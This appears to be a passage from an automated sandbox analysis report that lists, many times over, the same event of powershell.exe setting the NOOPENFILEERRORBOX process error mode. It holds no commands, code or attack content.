          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
